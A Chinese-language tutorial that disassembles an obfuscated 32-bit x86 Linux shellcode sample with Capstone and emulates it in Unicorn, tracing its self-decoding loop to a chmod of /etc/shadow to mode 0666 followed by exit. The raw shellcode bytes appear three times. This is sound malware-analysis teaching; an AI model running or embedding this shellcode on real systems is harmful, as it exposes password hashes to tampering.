练习使用Unicorn、Capstone
阅读原文时间:2023年07月11日阅读:1

Unicorn是一个轻量级的多平台,多体系结构的CPU仿真器框架。官网:http://www.unicorn-engine.org/

Capstone是一个轻量级的多平台,多体系结构的反汇编框架。官网:http://www.capstone-engine.org/

参考:https://bbs.pediy.com/thread-224330.htm

练习:分析混淆的shellcode

# Obfuscated 32-bit x86 shellcode sample (116 bytes) from the referenced thread.
# Only the prefix is meaningful to a static disassembler: the loop starting at
# offset 0x1d rewrites the tail (0x4e onward) in place, word by word, before
# jumping into it, so the bytes after 0x4e as stored here are not the code that
# eventually runs.
shellcode=b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"

使用capstone反汇编:

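from capstone import *

# Capstone handle for 32-bit x86. (The original used a C-style "//" comment
# here, which is a SyntaxError in Python.)
md = Cs(CS_ARCH_X86, CS_MODE_32)

shellcode = b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"

# Linear sweep from offset 0, printing "offset: mnemonic operands" per instruction.
# Note that a linear sweep is misled by this sample: the first instruction,
# `call 4`, targets its own last byte, so execution actually resumes at offset 4
# (`inc eax`) while the sweep continues at offset 5 and prints junk from there
# on. The Unicorn trace further down shows the real instruction stream.
for code in md.disasm(shellcode, 0x0):
    print("0x%x:\t%s\t%s" % (code.address, code.mnemonic, code.op_str))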

反汇编结果:

0x0: call 4
0x5: rcr byte ptr [ebp + 0x6a], 5
0x9: pop ebx
0xa: sub ebp, ebx
0xc: add ebp, 0x4e
0xf: mov ecx, ebp
0x11: push 2
0x13: add ecx, dword ptr [esp]
0x16: pop ebx
0x17: xor edx, edx
0x19: mov dx, 0x12
0x1d: mov edi, dword ptr [ecx]
0x1f: shl edi, 0x10
0x22: shr edi, 0x10
0x25: sub ecx, 0xfffffffe
0x2b: mov eax, dword ptr [ebp]
0x2e: shl eax, 0x10
0x31: shr eax, 0x10
0x34: mov ebx, eax
0x36: or ebx, edi
0x38: and eax, edi
0x3a: not eax
0x3c: and eax, ebx
0x3e: mov word ptr [ebp], ax
0x42: add ebp, 2
0x45: dec edx
0x46: test edx, edx
0x48: jne 0x1d
0x4e: in al, dx
0x4f: aaa
0x50: jne 0xaf
0x52: jp 0x59
0x54: sub ch, ch
0x56: and al, 0xed
0x58: and al, 0xed
0x5a: or ecx, dword ptr [eax - 0x67af1481]
0x60: cmp cl, bh
0x62: pop esp
0x63: xchg eax, esi
0x64: sub edx, dword ptr [esi - 0x390190]

下面使用unicorn模拟执行

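from unicorn import *
from unicorn.x86_const import *
from capstone import *

# Disassembler used by the code hook to print every executed instruction.
md = Cs(CS_ARCH_X86, CS_MODE_32)

BASE = 0x400000         # load address of the shellcode inside the emulator
STACK_ADDR = 0x0        # NOTE: mapping the stack at 0 also makes the null page
                        # valid, so a null-pointer access by the sample succeeds
                        # silently instead of faulting.
STACK_SIZE = 1024 * 1024

# 32-bit x86 emulator instance.
mu = Uc(UC_ARCH_X86, UC_MODE_32)

# Code region and stack region. mem_map() defaults to UC_PROT_ALL, which this
# sample relies on: its decoder loop writes the decoded tail back into the code
# region before executing it.
mu.mem_map(BASE, 1024 * 1024)
mu.mem_map(STACK_ADDR, STACK_SIZE)

shellcode = b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"

# Load the bytes to emulate. (The original used a C-style "//" comment here,
# which is a SyntaxError in Python.)
mu.mem_write(BASE, shellcode)
# Put ESP in the middle of the stack mapping so both pushes and pops have room.
mu.reg_write(UC_X86_REG_ESP, STACK_ADDR + STACK_SIZE // 2)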

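def syscall_num_to_name(num):
    """Map an i386 Linux syscall number (EAX at ``int 0x80``) to a name.

    Only the two numbers this sample uses are known. Any other number maps to
    ``"sys_unknown_<num>"`` instead of raising KeyError, so an unexpected
    syscall shows up in the trace rather than aborting the hook callback.
    """
    syscalls = {1: "sys_exit", 15: "sys_chmod"}
    return syscalls.get(num, "sys_unknown_%d" % num)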

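def _read_cstring(mu, addr, limit=256):
    """Read a NUL-terminated byte string at ``addr``, returning at most ``limit`` bytes.

    Reads in small chunks and stops at the first NUL. The address comes from
    a register the sample controls, so it may point outside the mapped
    regions; in that case the read stops at the unmapped chunk and whatever
    was read so far is returned (possibly empty) rather than raising.
    """
    out = bytearray()
    while len(out) < limit:
        try:
            chunk = mu.mem_read(addr + len(out), min(16, limit - len(out)))
        except UcError:
            break
        nul = chunk.find(b"\x00")
        if nul != -1:
            out += chunk[:nul]
            break
        out += chunk
    return out


def hook_code(mu, address, size, user_data):
    """UC_HOOK_CODE callback: trace each instruction and intercept ``int 0x80``.

    Args:
        mu: the Uc instance being emulated.
        address: address of the instruction about to execute.
        size: its encoded length in bytes.
        user_data: unused; passed through by Unicorn from hook_add().

    Uses the module-level Capstone handle ``md`` for printing and
    ``syscall_num_to_name`` to label the number in EAX. Only the ``int 0x80``
    entry is recognised; a sample entering the kernel another way (for
    example ``sysenter``) would not be intercepted by this hook.
    """
    # print('>>> Tracing instruction at 0x%x, instruction size = 0x%x' % (address, size))

    machine_code = mu.mem_read(address, size)
    for insn in md.disasm(machine_code, address):
        print("     0x%x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

    if machine_code != b"\xcd\x80":
        return

    r_eax = mu.reg_read(UC_X86_REG_EAX)
    r_ebx = mu.reg_read(UC_X86_REG_EBX)
    r_ecx = mu.reg_read(UC_X86_REG_ECX)
    r_edx = mu.reg_read(UC_X86_REG_EDX)
    syscall_name = syscall_num_to_name(r_eax)
    print("--------------")
    print("We intercepted system call: " + syscall_name)

    if syscall_name == "sys_chmod":
        # EBX = path pointer, ECX = mode. The original read a fixed 20 bytes,
        # which silently truncated longer paths and raised on unmapped memory.
        s = _read_cstring(mu, r_ebx)
        print("arg0 = 0x%x -> %s" % (r_ebx, s))
        print("arg1 = " + oct(r_ecx))
    elif syscall_name == "sys_exit":
        print("arg0 = " + hex(r_ebx))
        # Stop the emulation instead of calling exit(): the Python process stays
        # alive and emu_start() returns to the caller.
        mu.emu_stop()
    # The syscall is never forwarded to a real kernel: skip the int 0x80 and
    # resume at the following instruction.
    mu.reg_write(UC_X86_REG_EIP, address + size)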

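# Run hook_code before every instruction: it prints the trace and handles
# int 0x80. (The original lines used C-style "//" comments, a SyntaxError.)
mu.hook_add(UC_HOOK_CODE, hook_code)
# Emulate from BASE until execution runs off the end of the shellcode; the
# original `until=BASE - 1` could never be reached and relied entirely on the
# hook's sys_exit path to end the run.
mu.emu_start(BASE, BASE + len(shellcode))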

执行结果:

 0x400000:    call    0x400004  
 0x400004:    inc    eax  
 0x400006:    pop    ebp  
 0x400007:    push    5  
 0x400009:    pop    ebx  
 0x40000a:    sub    ebp, ebx  
 0x40000c:    add    ebp, 0x4e  
 0x40000f:    mov    ecx, ebp  
 0x400011:    push    2  
 0x400013:    add    ecx, dword ptr \[esp\]  
 0x400016:    pop    ebx  
 0x400017:    xor    edx, edx  
 0x400019:    mov    dx, 0x12  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40001d:    mov    edi, dword ptr \[ecx\]  
 0x40001f:    shl    edi, 0x10  
 0x400022:    shr    edi, 0x10  
 0x400025:    sub    ecx, 0xfffffffe  
 0x40002b:    mov    eax, dword ptr \[ebp\]  
 0x40002e:    shl    eax, 0x10  
 0x400031:    shr    eax, 0x10  
 0x400034:    mov    ebx, eax  
 0x400036:    or    ebx, edi  
 0x400038:    and    eax, edi  
 0x40003a:    not    eax  
 0x40003c:    and    eax, ebx  
 0x40003e:    mov    word ptr \[ebp\], ax  
 0x400042:    add    ebp, 2  
 0x400045:    dec    edx  
 0x400046:    test    edx, edx  
 0x400048:    jne    0x40001d  
 0x40004e:    cdq  
 0x40004f:    push    0xf  
 0x400051:    pop    eax  
 0x400052:    push    edx  
 0x400053:    call    0x400064  
 0x400064:    pop    ebx  
 0x400065:    push    0x1b6  
 0x40006a:    pop    ecx  

0x40006b: int 0x80

We intercepted system call: sys_chmod
arg0 = 0x400058 -> bytearray(b'/etc/shadow')
arg1 = 0o666
0x40006d: push 1
0x40006f: pop eax

0x400070: int 0x80

We intercepted system call: sys_exit
arg0 = 0x400058
